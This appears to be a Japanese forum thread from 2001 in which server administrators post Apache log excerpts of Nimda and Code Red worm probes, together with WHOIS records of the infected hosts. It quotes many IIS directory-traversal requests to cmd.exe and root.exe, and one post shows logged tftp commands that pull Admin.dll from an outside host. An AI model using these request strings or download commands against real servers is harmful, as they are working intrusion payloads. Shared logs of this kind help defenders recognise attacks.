>>66 logresolve とかどうですか? logresolve is a post-processing program to resolve IP- adresses in Apache's access logfiles. To minimize impact on your nameserver, logresolve has its very own internal hash-table cache. This means that each IP number will only be looked up the first time it is found in the log file.
こんな所からも来ました。 Domain Information: [ドメイン情報] a. [ドメイン名] IISR.GR.JP e. [そしきめい] いんたーねっとじょうほうせんりゃくけんきゅうしょ f. [組織名] インターネット情報戦略研究所 g. [Organization] Internet Information Strategy Research Institute k. [組織種別] 任意団体 l. [Organization Type] Group m. [登録担当者] SA1256JP n. [技術連絡担当者] SA1256JP p. [ネームサーバ] ns1.iisr.gr.jp p. [ネームサーバ] ns1.nava21.ne.jp p. [ネームサーバ] ns3.nava21.ne.jp y. [通知アドレス] asano@iisr.gr.jp [状態] Connected (2002/03/31) [登録年月日] 2000/10/03 [接続年月日] 2000/10/30 [最終更新] 2001/03/19 16:05:44 (JST) n-nakako@nava21.co.jp
74 :
ここの名前(・∀・)イイ ニムダアタック晒し Domain Information: [ドメイン情報] a. [ドメイン名] KIDDYLAND.CO.JP e. [そしきめい] かぶしきがいしゃきでいらんど f. [組織名] 株式会社 キデイランド g. [Organization] KIDDY LAND CO.,LTD k. [組織種別] 株式会社 l. [Organization Type] Corporation m. [登録担当者] SA235JP n. [技術連絡担当者] KS1250JP p. [ネームサーバ] ns.kiddyland.co.jp p. [ネームサーバ] s-field1.sunfield.ne.jp y. [通知アドレス] nsp-addr@sunfield.ne.jp [状態] Connected (2002/03/31) [登録年月日] 1997/12/02 [接続年月日] 1998/02/02 [最終更新] 2000/02/14 09:51:41 (JST) nsp-addr@sunfield.ne.jp
俺もあまりに頭にきたのでさらします 203.141.185.132 - - [18/Sep/2001:22:27:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 Domain Information: [ドメイン情報] a. [ドメイン名] OFFICETOKYO.CO.JP e. [そしきめい] f. [組織名] 東京事務所有限会社 g. [Organization] TOKYO JIMUSHO Co.,Ltd. k. [組織種別] 有限会社 l. [Organization Type] Company m. [登録担当者] TF198JP n. [技術連絡担当者] TF198JP p. [ネームサーバ] dns1.officetokyo.co.jp p. [ネームサーバ] mars.kcom.ne.jp y. [通知アドレス] [状態] Connected (2002/03/31) [登録年月日] 1997/03/28 [接続年月日] 1997/04/15 [最終更新] 1998/06/09 19:04:59 (JST) Sunabe@kddcom.co.jp
へ〜CodeBlueかぁ・・・と思ってウチのApacheのログ見たら GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-" GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-" GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-" GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-" GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-" GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-" GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-" GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-" GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-" GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-" GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-" GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-" GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-" GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-" GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-" GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-" ぎっしりこれで埋まってた。ようやくCodeRedが収まってきたと思ったら・・・。 ていうかこれCodeRed全盛の時よりももっとたくさんきてる気がするよ。
82 :
>>63 /c/winnt/system32/cmd.exe があると4発増える GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0 GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0 GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20210.145.120*%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0 GET /c/Admin.dll HTTP/1.0
